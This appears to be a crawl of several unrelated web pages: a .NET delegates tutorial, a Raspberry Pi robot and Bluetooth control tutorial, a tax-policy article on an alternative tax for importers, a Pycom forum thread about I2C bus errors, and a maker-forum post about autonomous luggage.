        c[0] = "LeftWheel";     // c[0] can be an l-value or an r-value.
        Console.WriteLine(c[0]);
    }
}

Interfaces support exactly the same concept as a C++ abstract base class (ABC) with only pure virtual functions. An ABC is a class that declares one or more pure virtual functions and thus cannot be instantiated. If you know COM or Java, interfaces in .NET are conceptually equivalent to a COM or Java interface. You specify them, but you don't implement them. A class that derives from your interface must implement your interface. An interface may contain methods, properties, indexers, and events. In .NET, a class can derive from multiple interfaces.

One of the most powerful features of C is its support for function pointers. Function pointers allow you to build software with hooks that can be implemented by someone else. In fact, function pointers allow many people to build expandable or customizable software. Microsoft .NET supports a type-safe version of function pointers, called delegates. Here's an example that may take a few minutes to sink in, but once you get it, you'll realize that it's really simple:

using System;
class TestDelegate
{
    // 1. Define callback prototype.
    delegate void MsgHandler(string strMsg);

    // 2. Define callback method.
    void OnMsg(string strMsg)
    {
        Console.WriteLine(strMsg);
    }

    public static void Main( )
    {
        TestDelegate t = new TestDelegate( );

        // 3. Wire up our callback method.
        MsgHandler f = new MsgHandler(t.OnMsg);

        // 4. Invoke the callback method indirectly.
        f("Hello, Delegate.");
    }
}

The first thing to do is to define a callback function prototype, and the important keyword here is delegate, which tells the compiler that you want an object-oriented function pointer. Under the hood, the compiler generates a nested class, MsgHandler, which derives from System.MulticastDelegate.[11] A multicast delegate supports many receivers. Once you've defined your prototype, you must define and implement a method with a signature that matches your prototype. Then, simply wire up the callback method by passing the function to the delegate's constructor, as shown in this code listing. Finally, invoke your callback indirectly. Having gone over delegates, you should note that delegates form the foundation of events, which are discussed in Chapter 8.

[11] If you want to see this, use ildasm.exe and view the metadata of the delegate.exe sample that we've provided.

A goal of .NET is to support language integration in such a way that programs can be written in any language, yet can interoperate with one another, taking full advantage of inheritance, polymorphism, exceptions, and other features. However, languages are not made equal because one language may support a feature that is totally different from another language. For example, Managed C++ is case-sensitive, but VB.NET is not. In order to bring everyone to the same sheet of music, Microsoft has published the Common Language Specification (CLS). The CLS specifies a series of basic rules that are required for language integration.
Since Microsoft provides the CLS that spells out the minimum requirements for being a .NET language, compiler vendors can build their compilers to the specification and provide languages that target .NET. Besides compiler writers, application developers should read the CLS and use its rules to guarantee language interoperation.
http://etutorials.org/Programming/.NET+Framework+Essentials/Chapter+2.+The+Common+Language+Runtime/2.6+The+CTS+and+CLS/
Robot Control

Difficulty: intermediate

This tutorial guides you through how to drive the servos on the robot, how to have it react to its environment through the use of sensors and, as an extension, how to control it over Bluetooth with a Wiimote.

REQUIREMENTS:

It is recommended that you look through the Buttons and Switches tutorial before beginning this one.

- Raspberry Pi
- Robot chassis
- Custom Pi shield
- Battery pack
- Bluetooth dongle
- Extension: Wiimote

INSTRUCTIONS:

It is recommended to use one of our SD cards or images. If you are not then you will need:

- the RPi.GPIO library
- our i2c library
- a kernel allowing i2c and having loaded these drivers, preferably i2c drivers in userspace
- python-smbus
- python-bluez
- to set your Bluetooth into discoverable mode (sudo hciconfig hci0 piscan)
- python-cwiid if doing extension

See the downloads page for further information.

Inspect your robot, make sure everything is connected and decide on what sensors you have available to you. First thing is to get the robot driving. Type python to get a console running; this does not need to be root for i2c control, however if you want to interface with other GPIO you will need to run as root (sudo python) instead. In your Python console:

    # import our i2c libraries to be able to speak to the chip
    import i2c

    # start a connection to the chip, default frequency is 50Hz
    # which is good for driving servos
    servos = i2c.I2C()

Now that you have a connection to the i2c chip you may have to calibrate your servos. This is done by sending pulses which should correspond to stationary and then adjusting a screw on each servo until they stop. Make sure your robot doesn't drive off the desk! So type:

    servos.setSpeeds(0,0)

to set pulses going to the servos and adjust these screws until the servos stop. Now everything's calibrated, let's test out our control! The setSpeeds function takes two arguments, the speed for the left motor and the speed for the right.
Each of these varies between -100 and 100, respectively full reverse and full forwards, with 0 being stationary. To have your robot ramp through its different speeds and then stop:

    import time

    for i in range(-100,100):
        servos.setSpeeds(i,i)
        time.sleep(0.2)
    servos.setSpeeds(0,0)

Great! Now you know how to make your robot move. Feel free to play around for a bit and get comfortable with these controls, practice making it turn on the spot or try to drive in a square.

So far you've had to have it tethered, what if you want it to roam free? First let's have it move autonomously. If you've already done the Image Processing tutorial you can put some of that knowledge and code to use, your image detection/tracking can now become following. From the centre coordinates you can tell which side of the robot the image is; if you then use speeds for each motor proportional to distance from centre of the image you should be chasing it quickly.

If you haven't done this and don't want to, there are several other control methods available. If your robot is equipped with bump switches then you can continuously check if either switch is hit and try to respond appropriately.

    # after having set-up inputs appropriately as in
    # Buttons and switches tutorial (or refer to cheat sheet)
    leftBumpPin = 21
    rightBumpPin = 18

    # set the robot driving
    servos.setSpeeds(100,100)

    while True:
        if (GPIO.input(leftBumpPin)):
            # here you may choose to turn right, spin on the spot,
            # reverse and turn right, etc.
            pass
        if (GPIO.input(rightBumpPin)):
            # appropriate actions if right bumper hit
            pass

Now let's try and control it remotely over Bluetooth.
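Before moving on to remote control, the drive-in-a-square exercise suggested earlier can be sketched as a short helper. This is only one possible approach: the timings (especially the turn_time needed for a roughly 90-degree spin) are assumptions you will have to calibrate for your own servos and surface, and on the robot you would pass in the servos object created earlier.

```python
import time

def drive_square(servos, side_time=1.0, turn_time=0.5):
    """Drive four sides of a square, spinning on the spot at each corner."""
    for _ in range(4):
        servos.setSpeeds(100, 100)   # full forward along one side
        time.sleep(side_time)
        servos.setSpeeds(100, -100)  # spin on the spot; turn_time is a
        time.sleep(turn_time)        # guess to calibrate for ~90 degrees
    servos.setSpeeds(0, 0)           # stop when the square is done

# On the robot:
# servos = i2c.I2C()
# drive_square(servos)
```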
We could dynamically search for Bluetooth devices to try to decide which to connect to with bluetooth.discover_devices() and bluetooth.lookup_name(bdaddress), but because you probably don't want to accidentally connect to someone else's robot it might be better to code in the address to connect to (or, if you don't want someone to steal your robot, a white-list of addresses allowed to connect, or even a password for control). Find out your robot's Bluetooth address by, in a terminal, running

    hciconfig | grep "BD Address"

This should return something in the form of

    BD Address: 00:15:83:XX:XX:XX ACL MTU: 339:8 SCO MTU: 128:2

Make a note of this BD Address. We will need 2 programs, a server running on the Pi and a client running on what you want to connect with. Let's start with the server. In a file called bluetooth-server.py:

    import bluetooth
    import i2c

    # create a socket on bluetooth
    # RFCOMM is one of several protocols bluetooth can use
    server_sock = bluetooth.BluetoothSocket(bluetooth.RFCOMM)

    # choose a port number, must be same on client and server, 1 is fine
    port = 1

    # bind our socket to this port, the "" indicates we are happy to connect
    # on any available bluetooth adapter
    server_sock.bind(("", port))

    # listen for any incoming connections
    server_sock.listen(1)

    # accept connections and create the client socket
    client_sock, address = server_sock.accept()
    print("Accepted connection from ", address)

    # Now is a good time to initialise our servos
    # maybe light an LED to indicate success as well
    servos = i2c.I2C()

    while True:
        # now everything is set-up we're ready to receive data
        data = client_sock.recv(1024)

        # an empty read means the client has disconnected
        if not data:
            break

        # print what we've received for debugging
        print("received [%s]" % data)

        # now we've got data it's up to you what you want to do with it!
        # We recommend sending tuples and decoding them as speeds to send
        # ensure client and server are consistent

    # when finished be sure to close your sockets
    client_sock.close()
    server_sock.close()
Now for the client. In bluetooth-client.py:

    import bluetooth

    # insert here the address of the Pi that you noted earlier
    bd_addr = "00:15:83:XX:XX:XX"

    # port must be consistent with server
    port = 1

    # create a socket and connect to the server
    sock = bluetooth.BluetoothSocket(bluetooth.RFCOMM)
    sock.connect((bd_addr, port))

    # we're now ready to send data!
    # This will repeatedly send what a user types, you will probably want to
    # decide a format and check for it here so it can be easily decoded the
    # other side
    while True:
        input = raw_input("What would you like to send? ")
        if (input == "quit"):
            break
        else:
            sock.send(input)

    # close up when finished
    sock.close()

If you run each of these (server on the Pi, client on your machine), you should be able to send messages over Bluetooth, great! Try to set it so you can send tuples of speeds, or maybe forward 5 to drive for 5 seconds and left or right to turn. You can even try to get Pis talking to each other and sharing their sensor data or trying to work together. It's up to you!

Examples of Bluetooth programs: bluetooth-client.py, bluetooth-server.py

EXTENSION: Wiimote Control

With a bit of coding and some help from our Wiimote tutorial, you should now be able to drive the robot with a Wiimote using either buttons, accelerometer or a mix. If you want to run your program at boot you should modify /etc/rc.local (as root) and add python /home/pi/wiimote.py. This is recommended as there can be USB issues when unplugging Ethernet which may break the Bluetooth connection.

An example of Mario Kart style controls: wiimote.py
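As a concrete sketch of the "tuples of speeds" suggestion above, one way to decode messages on the server side is shown below. The message format, the function name, and the clamping behaviour are all assumptions (the tutorial deliberately leaves the protocol up to you), and this assumes the received bytes have already been decoded to a string.

```python
def parse_speeds(message):
    """Decode a 'left,right' message into a (left, right) speed tuple.

    Speeds are clamped to the -100..100 range used by setSpeeds;
    returns None if the message is not in the expected format.
    """
    try:
        left_text, right_text = message.split(",")
        left, right = int(left_text), int(right_text)
    except ValueError:
        return None
    clamp = lambda v: max(-100, min(100, v))
    return clamp(left), clamp(right)

# The server loop might then do:
# speeds = parse_speeds(data)
# if speeds is not None:
#     servos.setSpeeds(*speeds)
```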
http://www.cl.cam.ac.uk/~db434/raspi/robot_control/
Stuart E. Leblang was Treasury associate international tax counsel from 1995 to 1997. Amy S. Elliott was formerly a contributing editor with Tax Notes magazine. In this article, Leblang and Elliott argue that Congress may want to consider an alternative tax for importers that would replace the border-adjusted tax until the cost of imports decreases sufficiently to put them into a better after-tax profit position.

Powerful interests, including major retailers, automobile dealers, and the Koch brothers, have spent the last few weeks railing against the border-adjusted tax in the hopes that they could sway President Trump to reject what is a central component of the business tax reform plan -- called "A Better Way" -- championed by House Speaker Paul D. Ryan, R-Wis., and Ways and Means Committee Chair Kevin Brady, R-Texas. The plan would effectively replace the corporate income tax with what is called a destination-based cash flow tax. Brady has indicated that he doesn't intend to implement it overnight but may use transition rules to ensure that the currency adjustment magic (that he claims will prevent net importers from taking a hit and will protect consumers from price increases) will actually come to pass. Those assurances haven't won over the critics who see the border-adjusted tax as simply a 20 percent tax on all imports that will most likely be passed on to consumers. Because of this growing opposition, it may be prudent for Congress to consider a special backstop -- an alternative tax -- for certain importers if the currency adjustment integral to the Ryan-Brady plan doesn't come to pass right away, causing their after-tax profits to decline.
A subset of businesses (including many retailers, some oil refiners, and others whose historic costs are made up of some threshold percentage of imports -- for example, 25 percent) could be allowed to use an alternative tax calculation that is more favorable than the Ryan-Brady plan in limited circumstances. This would not carve out any businesses or industries from the Ryan-Brady plan, because the alternative tax result generally would only be more favorable than the result under the Ryan-Brady plan if the dollar does not sufficiently appreciate. Businesses eligible for the alternative tax calculation would generally be allowed to deduct nearly all of their import costs from a tax base otherwise like the Ryan-Brady plan (allowing for full expensing, for example), and then would apply a tax rate similar to the top rate under current law, for example 35 percent. Businesses using the alternative tax would get a tax answer similar to current law. The alternative tax calculation contains a design feature (described in detail below) that would ensure that the only way for a business to end up with a better after-tax profit than what it has today would be for the currency to appreciate or its import costs to otherwise decrease and for it to be taxed under the Ryan-Brady plan. The alternative tax is insurance for importers that fear they'll be faced with taxes that are increasing but costs that aren't decreasing. Without it, the skepticism about currency exchange rate adjustments may prove to be insurmountable. Other alternative solutions -- including relief tied to currency adjustment failures, trade distortions, or price levels -- are unworkable because they are almost impossible to measure. Transition to the border-adjusted tax by way of a four-year, across-the-board phaseout of the import deduction and phase-in of the export exemption should also be rejected. 
It provides insufficient relief for importers if the currency doesn't adjust -- and if the currency adjusts more quickly in anticipation of the phase-in, exporters would be harmed. The alternative tax proposed here is designed to help reassure those businesses that are afraid they will be worse off under the Ryan-Brady plan. If the dollar gets stronger relative to other currencies -- something it has done by 25 percent over a recent 30-month period without deleterious effect -- importers will be better off not using the alternative tax calculation.

The Alternative Tax Calculation

We expect that the alternative tax would be available only to a limited subset of businesses with relatively high import costs (for example, those with historic import costs of 25 percent compared with total costs, although this could be refined to remove the cliff effect). The alternative tax calculation is like current law in that eligible businesses will be allowed to deduct most of their import costs. We expect the alternative tax will have a rate similar to the top corporate income tax rate under current law (somewhere around 35 percent). However, the alternative tax base will generally be smaller than it is under current law for retailers. With the exception of the import deduction, we expect it will look more like the base in the Ryan-Brady plan. While most import costs will be deductible under the alternative tax, there will be a limitation. Import costs attributable to related-party profit markup will be disallowed. This limitation is necessary to ensure that inverted companies and multinationals won't be able to use transfer pricing manipulations to shield a portion of their profits from U.S. tax. All unrelated-party import costs are deductible in the alternative tax calculation. However, related-party import costs can only be deducted as long as they're traceable to real expenditures such as costs paid for parts and labor.
If a related party marks up an import purely for profit, that profit element cannot be deducted in the alternative tax calculation. (Because this is a backstop, eligible businesses will be held to higher documentation standards for substantiating cost allocations to prevent abuse.) The other caveat to the alternative tax is that it will be adjusted in cases in which it causes the business to achieve an after-tax U.S. operating profit margin that is greater than that business's historic average (which could be calculated by averaging the business's top three annual after-tax U.S. operating profit margins out of the last five years). A similar firm-by-firm baseline was contemplated in 2005 by the President's Advisory Panel on Federal Tax Reform as part of a transition to the growth and investment tax, which is like the destination-based cash flow tax. To understand how it would work, imagine that Congress enacted the Ryan-Brady plan with an alternative tax available for certain import-oriented businesses. A business with high import costs (RetailCo) calculates what its tax would be under Ryan-Brady and doesn't like what it sees. Ryan-Brady may cause RetailCo's after-tax U.S. operating profit margin to drop sharply or go negative (for examples with numbers, see the appendix). Instead, RetailCo pays the alternative tax, which generally gives it a better after-tax U.S. operating profit answer than the Ryan-Brady plan and a similar tax answer (unless it has a lot of related-party import profit markup) to what it has under current law. If at any time -- and this will generally happen when the currency adjusts and RetailCo's import costs go down -- the alternative tax calculation would cause the business to have a better after-tax U.S. operating profit margin than its historic average, then the tax due is increased (or if it is designed as a credit, the credit is decreased) to prevent such a result. 
According to our estimates, in many cases well before the dollar has appreciated by 25 percent (for whatever reason), the business will find that it is better off being taxed under the Ryan-Brady plan. The alternative tax isn't simple or perfect. Several complications will have to be taken into account. The use of a U.S. operating profit margin cap raises various accounting considerations, and rules will need to be established to provide uniformity and prevent manipulation. Economic factors like a recession could also affect the calculation, complicating the transition away from the alternative tax. However, if a solution like this could actually be designed to work, it could have a significant impact on the debate because it would substantially address many of the arguments levied against the Ryan-Brady plan.

Insuring Against Currency Adjustment

Although the alternative tax will act as insurance for importers if the currency doesn't adjust, it doesn't remove the incentive for currency adjustment. The alternative tax is designed so that if the currency fully adjusts, businesses will always be better off being taxed under the Ryan-Brady plan, all else being equal. Because of this feature, we think it shouldn't significantly impede the currency adjustment but should help feed into all of the many market factors that will fuel the change. As the dollar appreciates, the import cost deductions built into the alternative tax calculation become less and less valuable. At some point -- in many cases well before the currency has appreciated the full 25 percent anticipated under the border-adjusted tax -- businesses will want to be taxed under a system that doesn't cap their after-tax U.S. operating profits and that offers a low 20 percent rate even though they'll lose their import deductions.
The revenue impact of the alternative tax will depend on the alternative tax rate (we use 35 percent, but that is just to help show how the numbers might work) and base and which businesses will be eligible. However, we think those parameters can be designed to ensure that on day 1, assuming no currency adjustment, the government would get approximately the same amount of revenue from alternative tax businesses as it receives from them now under current law. Note that if the currency doesn't adjust over time, that presumably would alter the trade balance, encouraging exports and potentially resulting in a boost to the economy. Although this alternative tax approach could raise its own unique issues under the WTO's anti-discrimination rules, we think it could be designed so that it is less problematic to implement than some alternatives.

Threatening the Closed System

If the perfect world that economists envision comes to pass and the Ryan-Brady plan causes the dollar to appreciate enough to offset the border-adjusted tax, few if any businesses will use the alternative tax calculation because they generally will have higher after-tax profits under Ryan-Brady. If the dollar takes time to appreciate, then as that happens -- no matter how long that takes and no matter why it is happening -- the alternative tax gives businesses more manageable after-tax U.S. operating profit margins in the meantime, reducing the chances that consumer prices will rise. We know some economists will be averse to the idea of an alternative tax. They will argue that it threatens the integrity of the Ryan-Brady plan. They will say that any special rules for a limited group of businesses will upset the balance of the border adjustments and will undermine the appreciation of the dollar. The alternative tax is simply a political tool to generate support for the Ryan-Brady plan.
If the Ryan-Brady plan can't get through Congress, whether the currency will adjust in a perfect system won't even matter. This is not an absolute carveout. Businesses that pay the alternative tax would have to pay taxes determined in part by a calculation that uses a much higher tax rate than what is in the Ryan-Brady plan. And currency adjustments are still relevant to the calculation. It is a limited carveout that could get the Ryan-Brady plan to the finish line and is worth considering. Americans who called for corporations to pay their fair share should support the Ryan-Brady plan with the alternative tax. It would help stop businesses from being able to achieve single-digit effective tax rates by putting their valuable intellectual property in tax havens and playing games with what their right hand is charging their left hand to minimize the amount of income that is taxed in the United States. Retailers have some of the highest effective tax rates (averaging close to the top rate of 35 percent) and some of the lowest profit margins. There is a perceived threat that the Ryan-Brady plan gone wrong could harm retailers. Americans are concerned that the border-adjusted tax could shrink their wallets. In politics, those concerns are hard to ignore. The alternative tax helps to address these problems. Under the alternative tax, businesses will effectively get to deduct more of their import costs so there won't be as much pressure to raise prices. If the dollar does strengthen even a little relative to other currencies, retailers will end up paying less for their imports, which will still figure into the alternative tax calculation, and their after-tax U.S. operating profits will rise up to the cap. As the dollar continues to strengthen, the low 20 percent rate looks more appealing, and the freedom from the after-tax U.S. operating profit margin cap will make more and more businesses want to be taxed under the Ryan-Brady plan. 
The alternative tax makes the Ryan-Brady plan more likely to be a win-win. It acts as insurance to help prevent the kinds of catastrophic outcomes feared by importers and consumers. A reform plan that helps level the playing field for U.S. businesses and helps end the transfer pricing games played by inverted companies and some multinationals is worth saving.

Appendix. Taxing Importers Under the Alternative Tax

This table shows how the alternative tax would work for a variety of businesses. For a business to get a higher profit margin than its historic average, import costs must go down enough for the business to want to be taxed under the Ryan-Brady plan. This happens at different levels of appreciation (15 percent in Example 1, 8 percent in Example 2, 0 percent in Example 3) depending on the specific profit margin and import cost profile of the business. Example 1 also shows why the profit margin cap is needed. All figures are after-tax U.S. operating profit margins.

Example 1: High profit margin (20.3 percent), high import cost (93 percent) business
$125 U.S. receipts, $5 U.S. costs, $80 real import costs, $1 related-party import profit (import costs go down to $74.07 and 93 cents at 8 percent appreciation and $69.57 and 87 cents at 15 percent appreciation)
Assuming no decrease in import costs: current law 20.3%; Ryan-Brady 12.0%; alternative tax 20.0%
Assuming 8 percent appreciation: Ryan-Brady 16.8%; alternative tax 23.1%*
Assuming 15 percent appreciation: Ryan-Brady 20.4%

Example 2: High profit margin (22.9 percent), medium import cost (61.7 percent) business
$125 U.S. receipts, $30 U.S. costs, $50 real import costs, $1 related-party import profit (import costs go down to $46.30 and 93 cents at 8 percent appreciation)
Assuming no decrease in import costs: current law 22.9%; Ryan-Brady 20.0%; alternative tax 22.6%
Assuming 8 percent appreciation: Ryan-Brady 23.0%

Example 3: High profit margin (20.3 percent), low import cost (26.7 percent) business
$125 U.S. receipts, $62 U.S. costs, $23 real import costs, $1 related-party import profit
Assuming no decrease in import costs: current law 20.3%; Ryan-Brady 21.1%

Example 4: Medium profit margin (11.4 percent), high import cost (89.3 percent) business
$125 U.S. receipts, $10 U.S. costs, $92 real import costs, $1 related-party import profit (import costs go down to $76.67 and 83 cents at 20 percent appreciation)
Assuming no decrease in import costs: current law 11.4%; Ryan-Brady -0.8%; alternative tax 11.2%
Assuming 20 percent appreciation: Ryan-Brady 11.6%

Example 5: Medium profit margin (10.4 percent), medium import cost (64.8 percent) business
$125 U.S. receipts, $36 U.S. costs, $68 real import costs, $1 related-party import profit (import costs go down to $57.14 and 84 cents at 19 percent appreciation)
Assuming no decrease in import costs: current law 10.4%; Ryan-Brady 1.8%; alternative tax 10.1%
Assuming 19 percent appreciation: Ryan-Brady 10.6%

Example 6: Medium profit margin (9.9 percent), low import cost (26.4 percent) business
$125 U.S. receipts, $77 U.S. costs, $28 real import costs, $1 related-party import profit (import costs go down to $25 and 89 cents at 12 percent appreciation)
Assuming no decrease in import costs: current law 9.9%; Ryan-Brady 7.5%; alternative tax 9.6%
Assuming 12 percent appreciation: Ryan-Brady 10.0%

Example 7: Low profit margin (3.6 percent), high import cost (95.8 percent) business
$125 U.S. receipts, $4 U.S. costs, $113 real import costs, $1 related-party import profit (import costs go down to $91.13 and 81 cents at 24 percent appreciation)
Assuming no decrease in import costs: current law 3.6%; Ryan-Brady -13.8%; alternative tax 3.4%
Assuming 24 percent appreciation: Ryan-Brady 3.9%

Example 8: Low profit margin (4.7 percent), medium import cost (62.1 percent) business
$125 U.S. receipts, $43 U.S. costs, $72 real import costs, $1 related-party import profit (import costs go down to $58.54 and 81 cents at 23 percent appreciation)
Assuming no decrease in import costs: current law 4.7%; Ryan-Brady -5.9%; alternative tax 4.4%
Assuming 23 percent appreciation: Ryan-Brady 5.0%

Example 9: Low profit margin (4.7 percent), low import cost (25.9 percent) business
$125 U.S. receipts, $85 U.S. costs, $30 real import costs, $1 related-party import profit (import costs go down to $25.21 and 84 cents at 19 percent appreciation)
Assuming no decrease in import costs: current law 4.7%; Ryan-Brady 0.8%; alternative tax 4.4%
Assuming 19 percent appreciation: Ryan-Brady 4.8%

* The profit margin cap is necessary because as import costs go down, the alternative tax calculation could result in a higher after-tax U.S. operating profit margin (profit margin) than the Ryan-Brady plan. The cap increases the business's tax bill (but not its profit margin) to ensure that the only way such cost reductions will give the business a better profit margin is when the business can achieve it by way of the Ryan-Brady plan. In Example 1 above, the business will not have a profit margin of 23.1 percent assuming 8 percent appreciation but will have to pay extra tax so that it will only have a profit margin of 20.3 percent. The calculations for Example 1 are below. Note that we assumed only a small amount ($1) of related-party import profit in all of the examples. Businesses will get worse answers from the alternative tax if they have larger amounts of this type of import cost as it can be inflated to avoid tax under current law:

Current-law profit margin = $125 receipts - $5 U.S. costs - $80 real import costs - $1 related-party import profit = $39 tax base x 35 percent tax rate = $13.65 tax; $39 pretax profit - $13.65 tax = $25.35 after-tax profit; and $25.35 after-tax profit / $125 receipts = 20.3 percent profit margin.

Ryan-Brady profit margin = $125 receipts - $5 U.S. costs = $120 tax base x 20 percent tax rate = $24 tax; $125 receipts - $5 U.S. costs - $80 real import costs - $1 related-party import profit = $39 pretax profit; $39 pretax profit - $24 tax = $15 after-tax profits; and $15 after-tax profits / $125 receipts = 12 percent profit margin.

Alternative tax profit margin = $125 receipts - $5 U.S. costs - $80 real import costs = $40 tax base x 35 percent = $14 tax; $39 pretax profit - $14 tax = $25 after-tax profit; and $25 after-tax profit / $125 receipts = 20 percent profit margin.

To calculate how much tax is owed when the cap is triggered (when there has only been 8 percent appreciation, for example), start with current-law profit margin. On $125 of receipts, a 20.3 percent profit margin means having an after-tax profit of $25.35. For the tax due, subtract $25.35 from the pretax profit at 8 percent appreciation ($125 receipts - $5 U.S. costs - $74.07 real import costs - 93 cents related-party import profit = $45 pretax profit; and $45 pretax profit - $25.35 = $19.65 tax due).

Note that whether a business has receipts from exports is irrelevant, because under the Ryan-Brady base, receipts from non-U.S. consumption aren't taxed. These examples do not show the benefits of using a Ryan-Brady base, including any benefit from immediate expensing.
However, if a business using the alternative tax calculation benefits from that, the benefit will always be capped if it results in a higher profit margin than its historic average until it moves to being taxed under Ryan-Brady.

[1] The optimistic views and simplistic thinking in this article are their own.
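The Example 1 arithmetic above can be checked with a few lines of code. This is only a simplified sketch of the appendix calculations (the function name is ours, and it deliberately ignores refinements such as immediate expensing and the historic-margin cap):

```python
def margins(receipts, us_costs, real_imports, rp_profit):
    """After-tax U.S. operating profit margins under the three regimes."""
    pretax = receipts - us_costs - real_imports - rp_profit

    # Current law: all import costs deductible, 35 percent rate.
    current = (pretax - 0.35 * pretax) / receipts

    # Ryan-Brady: no import deduction, 20 percent rate on the larger base.
    ryan_brady = (pretax - 0.20 * (receipts - us_costs)) / receipts

    # Alternative tax: real import costs deductible, but not the
    # related-party profit markup; 35 percent rate.
    alternative = (pretax - 0.35 * (receipts - us_costs - real_imports)) / receipts

    return current, ryan_brady, alternative

# Example 1: $125 receipts, $5 U.S. costs, $80 real imports, $1 markup
cur, rb, alt = margins(125, 5, 80, 1)
print(round(cur, 3), round(rb, 3), round(alt, 3))  # 0.203 0.12 0.2
```

Running the same function on the other appendix examples reproduces their margins as well (for instance, Example 4 gives 11.4 percent, -0.8 percent, and 11.2 percent).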
http://www.taxanalysts.org/content/slightly-better-better-way-plan
I2C Bus Error

Hello, I have consistently been having the OSError: I2C bus error and have yet to find a fix that works. There are a few topics already where people have just updated their pytrack firmware/LoPy firmware to fix the problem. I am on the most recent versions of both of these and still no fix.

The traceback:

    OSError: I2C bus error.

Line 115 is:

    self.i2c.writeto(I2C_SLAVE_ADDR, data)

Also getting it:

    File "pycoproc.py", line 129, in _wait
    OSError: I2C bus error.

Line 117 is:

    self._wait()

Does anyone have any ideas on what could be going wrong? Sometimes the module can be running for a few hours before it gets an error, sometimes it happens several times in a row.

Cheers, Dylan

@livius Thanks, that is now working. I am getting [] while everything is working, and it seems to say "None" just before a "Board not detected" error. No change on anything when receiving an I2C bus error message. @ledbelly2142 what do you mean by checking the pins? I've gone as far as removing the LoPy from the Pytrack and having a look haha, but it looks like normal pins to me. Hope everyone had a good Christmas and New Years

@dylan said in I2C Bus Error:

    Yup, I just tried it again but with capitals, I2C.scan(), got "TypeError: function takes 1 positional arguments but 0 were given"

because you use the class, not an object (1 argument is needed: self, the object itself). You must create an I2C object first to use it.

    from machine import I2C

    # here you create object `my_obj` of class type `I2C`
    my_obj = I2C(0, I2C.MASTER, baudrate=100000)

    # here you get a list of device addresses
    devices = my_obj.scan()
    print(devices)

I'm also still consistently getting the "Exception: Board not detected". Thought I'd just post here rather than make another topic. I have re-installed pytrack 0.0.8 twice now, the message in command prompt and all along the way suggests that everything worked perfectly, also updated to the 1.10.2.b1 firmware for LoPy.
I'm using the most recent pycoproc.py/pytrack.py files. My fix has been a terrible one: I just put machine.reset() before the "raise Exception('Board not detected')" line. It works, but it certainly isn't a great solution. Last night my device ran for 4 hours before stopping, which was great, but I'm going to be needing weeks to months at a time. I'm so close to being able to send my device out in the field :D.

@ledbelly2142 Not sure on the battery voltage pins, but that's what I've been looking at since your last reply. So far this is what I've found:

    def read_battery_voltage(self):
        self.set_bits_in_memory(ADCON0_ADDR, _ADCON0_GO_nDONE_MASK)
        time.sleep_us(50)
        while self.peek_memory(ADCON0_ADDR) & _ADCON0_GO_nDONE_MASK:
            time.sleep_us(100)
        adc_val = (self.peek_memory(ADRESH_ADDR) << 2) + (self.peek_memory(ADRESL_ADDR) >> 6)
        # add 10mV to compensate for the drop in the FET
        return (((adc_val * 3.3 * 280) / 1023) / 180) + 0.01

    def set_bits_in_memory(self, addr, bits):
        self.magic_write_read(addr, _or=bits)

    def peek_memory(self, addr):
        self._write(bytes([CMD_PEEK, addr & 0xFF, (addr >> 8) & 0xFF]))
        return self._read(1)[0]

    _ADCON0_GO_nDONE_MASK = const(0x02)
    ADCON0_ADDR = const(0x9D)
    ADRESL_ADDR = const(0x09B)
    ADRESH_ADDR = const(0x09C)

Really not sure what the 0x9D parts mean; I can't see anything else that might be related to which pins the voltage is using.

@dylan I don't know if you can move the I2C pins; I moved mine on the breakout board (not the Pysense) with the deep sleep shield. Not sure which pins the Pytrack is using for I2C (looks like G8 (P21) SCL and G9 (P22) SDA), but it seems like they should not be on the same pin as the voltage reading. What pin are you using to read the battery voltage? I don't know how it works with the Pysense board. I'm getting coordinates and a battery voltage reading sent at the same time to TTN etc.
I was thinking that maybe they are both using the same pins, and that's how sometimes they throw each other out; from memory, the error is always for the battery voltage, and the voltage reading is taken first in the code.

@ledbelly2142 Yup, I just tried it again but with capitals, I2C.scan(), got "TypeError: function takes 1 positional arguments but 0 were given".

That sounds like it will give me a good start, cheers. I put in a line i2c.scan() just before the error message so it would come up when there has been an error, but it came back saying "AttributeError: NoneType object has no attribute 'scan'". How should I be putting in the i2c.scan() to get it to work?

When I have received this error in the past, it was due to having the wrong I2C address for the device. This may not be your issue, but you can rule it out and check the device address with i2c.scan(). If you don't get anything back, check the pins of your I2C connection. I apologize if you already tried this; it's just a simple thing to check and rule out if you haven't already.
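Since the bus error here is intermittent rather than permanent, one generic way to keep the application alive without a full machine.reset() is to wrap the failing call in a small retry loop. This is only a sketch: `flaky_write` is a hypothetical stand-in for `self.i2c.writeto(...)`, and the retry count and delay are guesses, not Pycom recommendations.

```python
import time

def i2c_retry(func, retries=3, delay_s=0.05):
    """Call func(); on OSError (e.g. 'I2C bus error'), wait and retry.

    Re-raises the last OSError if every attempt fails.
    """
    last_error = None
    for _ in range(retries):
        try:
            return func()
        except OSError as exc:
            last_error = exc
            time.sleep(delay_s)  # give the bus a moment to recover
    raise last_error

# Demo with a flaky stand-in for self.i2c.writeto(): it fails twice, then works.
calls = {"n": 0}

def flaky_write():
    calls["n"] += 1
    if calls["n"] < 3:
        raise OSError("I2C bus error")
    return "ok"

print(i2c_retry(flaky_write))  # prints "ok" after succeeding on the third attempt
```

On the device you would pass something like `lambda: self.i2c.writeto(I2C_SLAVE_ADDR, data)` instead of the stand-in; if the bus is genuinely dead, the original OSError is still raised after the last attempt, so real faults are not silently swallowed.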
https://forum.pycom.io/topic/2314/i2c-bus-error
45. Re: Show Off Your Build (benheck, Mar 14, 2012 11:11 AM, in response to aouate3)

Thanks for sharing your projects!

46. Re: Show Off Your Build (Stevhip, Mar 20, 2012 12:35 PM, in response to Christy-Admin)

Trying desperately to reach Ben Heck. My name is Steven McMahon and I registered for this site so that I could send you a message. I came up with the idea for autonomous luggage some time ago, and I'm not looking for any credit or anything for it. I actually sent the idea in to Apple Computer and Steve Wozniak; I still have the emails in my sent folder from last year and will be happy to share them with you. I am disabled with 8 herniated discs and migraine headaches and other issues which I prefer not to discuss here.

My idea differs from yours a bit. I wanted a seat that one could flip out on the top, and iPad-type batteries or maybe laptop batteries inside. I thought that iPad batteries would be thin, light and powerful. I also wanted to incorporate plugs and USB ports for charging one's devices while waiting for a plane. So someone traveling through an airport would have their own seat and their own plugs, and when they got to their destination or an available outlet, they could plug in their luggage to recharge it. I thought it would be important for a commercial product to have enough power to recharge people's iPads, tablets, iPhones, etc. I also thought that a solar panel would be a great accessory to sell for recharging between trips.

